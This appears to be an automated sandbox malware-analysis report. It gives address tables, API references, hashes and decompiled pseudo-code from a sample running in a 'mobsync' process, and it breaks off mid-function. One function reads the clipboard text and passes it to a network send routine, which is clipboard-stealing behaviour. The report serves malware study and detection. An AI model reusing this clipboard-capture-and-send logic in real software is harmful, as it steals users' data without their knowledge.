0x004433e9
0x004433eb
0x004433ed
0x00000000
0x00000000
0x004433ef
0x00000000
0x004433ef
0x00443385
0x0044338a
0x00000000
0x00000000
0x00443390
0x00443392
0x00000000
0x00000000
0x004433a9
0x004433ae
0x004433b2
0x00000000
0x00000000
0x00000000
0x004433b8
0x004432eb
0x004432ed
0x004432ef
0x004432f7
0x00443316
0x00443318
0x00443322
0x00443324
0x00443325
0x00443327
0x00000000
0x00000000
0x0044332d
0x00443333
0x00443333
0x00000000
0x00443333
0x004432fb
0x004432ff
0x00443304
0x00443308
0x00000000
0x00000000
0x0044330e
0x00000000
0x0044330e

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428772,?,?,?,004434BE,00000001,00000001,?), ref: 004432C7
__alloca_probe_16.LIBCMT ref: 004432FF
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428772,?,?,?,004434BE,00000001,00000001,?), ref: 0044334D
__alloca_probe_16.LIBCMT ref: 004433E4
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00443447
__freea.LIBCMT ref: 00443454

Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,0042F939,?,?,00431057,?,?,?,?,?,0040BA4E,0042F939,?,?,?,?), ref: 0043E64F

__freea.LIBCMT ref: 0044345D
__freea.LIBCMT ref: 00443482

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 2597970681-0
Opcode ID: eb0c029f88e7b01b82b2d365f7f4090b3c7d8acf979be6a384da7069183595e8
Instruction ID: 0cad5e9ef2b3b2de0836d9d1cfed8af2ee8cc4fd49053d42945b5b1fc1f44aaa
Opcode Fuzzy Hash: eb0c029f88e7b01b82b2d365f7f4090b3c7d8acf979be6a384da7069183595e8
Instruction Fuzzy Hash: 1F511672A00216ABFB264E61DC41EEF77A9EB44B56F14466AFD04D6280DB3CDD408698

Uniqueness

Uniqueness Score: -1.00%

Function 00412724, Relevance: 12.0, APIs: 8, Instructions: 49
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00412724(void* __ebp, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				void* _t16;
				struct HWND__* _t23;
				void* _t38;
				void* _t41;

				if(OpenClipboard(_t23) != 0) {
					EmptyClipboard();
					CloseClipboard();
					if(OpenClipboard(_t23) != 0) {
						_t38 = GetClipboardData(0xd);
						_t16 = GlobalLock(_t38);
						GlobalUnlock(_t38);
						CloseClipboard();
						_t29 =  !=  ? _t16 :  &E0045F714;
						E0040425F(_t23,  &_a36,  !=  ? _t16 :  &E0045F714);
						_t34 =  &_a32;
						L00416CF4(_t23, _t41 - 0x18,  &_a32);
						_push(0x6b);
						E00404A6E(_t23, 0x46c768,  &_a32, _t16);
						L00401ED0();
					}
				}
				L00401E54( &_a16, _t34);
				L00401FA7();
				L00401FA7();
				return 0;
			}

0x0041272d
0x00412733
0x00412739
0x00412748
0x00412756
0x00412759
0x00412762
0x00412768
0x00412775
0x0041277d
0x00412785
0x0041278b
0x00412790
0x00412797
0x00412b2a
0x00412b2a
0x00412748
0x00412d65
0x00412d71
0x00412d7d
0x00412d8a

APIs

OpenClipboard.USER32 ref: 00412725
EmptyClipboard.USER32 ref: 00412733
CloseClipboard.USER32 ref: 00412739
OpenClipboard.USER32 ref: 00412740
GetClipboardData.USER32 ref: 00412750
GlobalLock.KERNEL32 ref: 00412759
GlobalUnlock.KERNEL32(00000000), ref: 00412762
CloseClipboard.USER32 ref: 00412768

Part of subcall function 00404A6E: send.WS2_32 ref: 00404AE2

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID:
API String ID: 2172192267-0
Opcode ID: fd21a50fea0555c73dc9bfbe906274dd2a3677d48e46f46c8e6c21b0f1136bfe
Instruction ID: 4156f71339dd3ecea6f92ec0e14f94680420b0c666956b6fa8fd4283cc091fe2
Opcode Fuzzy Hash: fd21a50fea0555c73dc9bfbe906274dd2a3677d48e46f46c8e6c21b0f1136bfe
Instruction Fuzzy Hash: 7F0161312043008BC314BF71ED49AAEB7A5AF90743F44457FF906D21A2DF38CA588A5A

Uniqueness

Uniqueness Score: -1.00%

Function 00447855, Relevance: 10.7, APIs: 7, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00447855(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = L0043DFD9(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E0043E61D(0, 4);
						_t127 = 0;
						_v12 = _t132;
						L0043EE85(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x46a188; // 0x46a180
								 *_t133 = _t57;
								_t58 =  *0x46a18c; // 0x46b64c
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x46a190; // 0x46b64c
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x46a1b8; // 0x46a184
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x46a1bc; // 0x46b650
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E0043E61D(_t107, 4);
							_v20 = _t134;
							L0043EE85(0);
							if(_t134 == 0) {
								L11:
								L0043EE85(_v8);
								L0043EE85(_v12);
								return _v16;
							}
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = E0044A26E(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
							_t136 = _t135 | E0044A26E(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
							_v16 = _v8 + 8;
							_t137 = _t136 | E0044A26E(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
							_t138 = _t137 | E0044A26E(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
							if((E0044A26E(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E004477EC(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						L0043EE85(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x46a188;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							L0043EE85( *((intOrPtr*)(_t100 + 0x7c)));
							L0043EE85( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}

0x00447855
0x0044785e
0x00447865
0x00447868
0x00447871
0x00447890
0x00447893
0x00447898
0x0044789f
0x004478b2
0x004478b3
0x004478bc
0x004478be
0x004478c1
0x004478c4
0x004478ca
0x004478cd
0x004478e0
0x004478e8
0x00447a42
0x00447a45
0x00447a4a
0x00447a4c
0x00447a51
0x00447a54
0x00447a59
0x00447a5c
0x00447a61
0x00447a64
0x00447a69
0x004479d2
0x004479d8
0x004479dc
0x004479de
0x004479de
0x00000000
0x004479dc
0x004478f5
0x004478f8
0x004478fb
0x00447904
0x00447999
0x0044799c
0x004479a5
0x00000000
0x004479ae
0x0044790d
0x00447912
0x00447926
0x0044793a
0x00447946
0x00447954
0x0044796e
0x0044798a
0x004479b4
0x004479c7
0x004479b8
0x004479bc
0x00447a2f
0x00000000
0x00000000
0x00447a31
0x00447a33
0x00447a36
0x00447a38
0x00447a3b
0x004479c2
0x004479c4
0x004479c6
0x004479c6
0x004479c6
0x004479bc
0x004479cc
0x004479cf
0x00000000
0x004479cf
0x0044798f
0x00447994
0x00000000
0x00447998
0x004478d2
0x00000000
0x004478da
0x00000000
0x0044787b
0x0044787b
0x0044787d
0x00447880
0x004479e0
0x004479e0
0x004479e8
0x004479ea
0x004479ea
0x004479f2
0x004479f7
0x004479fb
0x00447a00
0x00447a0b
0x00447a11
0x004479fb
0x00447a15
0x00447a1a
0x00447a20
0x00000000
0x00447a20

APIs

_free.LIBCMT ref: 004478C4
_free.LIBCMT ref: 004478D2
_free.LIBCMT ref: 00447A00
_free.LIBCMT ref: 00447A0B

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d1be386d2180fe272be18c35b752fbdf57bcfbdef81dcf2f65aa49f30547721c
Instruction ID: 4a395575b819a6d294d3ee7acebf23b8f9ee550dc3552f8ac4883c6f511beba5
Opcode Fuzzy Hash: d1be386d2180fe272be18c35b752fbdf57bcfbdef81dcf2f65aa49f30547721c
Instruction Fuzzy Hash: 7361F371904205AFEB20DF65C842B9EBBF4EF49710F14016BE954EB381E7749D42CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0043D1E1, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0043D1E1(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				intOrPtr _t293;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = E0043E61D(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x43c9e0
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x457488);
					_push( *0x457344);
					E0043D120(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x457344;
					while(1) {
						L2:
						_t244 = L00446DB7(_t427, 0x351, ";");
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
							if(_t420 !=  *_t411) {
								break;
							}
							if(_t420 == 0) {
								L8:
								_t340 = 0;
							} else {
								_t420 =  *((intOrPtr*)(_t339 + 2));
								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
									break;
								} else {
									_t339 = _t339 + 4;
									_t411 = _t411 + 4;
									if(_t420 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t370 = _v8 + 0xc;
							_v8 = _t370;
							_v12 = _v12 &  !( ~_t340);
							_t343 = _v16;
							_v16 = _t343;
							_push( *_t343);
							_push(0x457488);
							_push( *_t370);
							E0043D120(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
							_t470 = _t471 + 0x18;
							if(_v8 < 0x457374) {
								goto L2;
							} else {
								if(_v12 != 0) {
									L0043EE85(_t357);
									_t31 = _t443 + 0x28; // 0x30ff068b
									_t434 = _t427 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t443 + 0x28; // 0x30ff068b
											L0043EE85( *_t32);
										}
									}
									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											L0043EE85( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											L0043EE85( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											L0043EE85( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043629A();
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x46a00c; // 0x44c884ad
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E0043D1E1(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = L0043CDA9(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t76 = _t428 + 0x20; // 0x43c9d0
									_t421 = _t76;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = L00447F17(_t444, 0x457480);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x457344;
													_v460 = 1;
													do {
														_t266 = L00447EDD( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x457374;
													} while (_t362 <= 0x457374);
													_t359 = _v472 + 2;
													_t267 = L00447E8D(_t376, _t359, ";");
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = L00446EF9(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E0043629A();
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_t273 =  *0x46a00c; // 0x44c884ad
																_v556 = _t273 ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = E00440972(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = L0043CDA9(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t101 = _t364 + 2; // 0x6
																	_t450 = _t101 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = E0043E61D(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_t125 = _t364 * 4; // 0xb86e
																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
																				_t128 = _t432 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = E00440264(_t286 + 4, _v728,  &_v280);
																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					E0043629A();
																					asm("int3");
																					_t293 =  *0x46b508; // 0x0
																					return _t293;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = E0043CAB6(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							_t154 = _t432 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t403;
																							if( *_t154 ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t178 = _t432 + 8; // 0x8b56ff8b
																								_t319 = L00447F5C(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x457400, 0x7f,  &_v536,  *_t178, 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = E004330D1( &_v536,  *0x46a170, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								_t193 = _t432 + 8; // 0x8b56ff8b
																								 *_t457 =  *_t193;
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t297 = _t364 * 0xc;
																					_t200 = _t297 + 0x457340; // 0x40e12c
																					 *0x45346c(_t432);
																					_t299 =  *((intOrPtr*)( *_t200))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x46a2a8;
																						if(_t396 != 0x46a2a8) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t456 * 8; // 0x30ff068b
																								L0043EE85( *((intOrPtr*)(_t432 + _t218 + 0x28)));
																								_t221 = _t456 * 8; // 0x30ff0c46
																								L0043EE85( *((intOrPtr*)(_t432 + _t221 + 0x24)));
																								_t224 = _t364 * 4; // 0xb86e
																								L0043EE85( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						_t205 = _t364 * 4; // 0xb86e
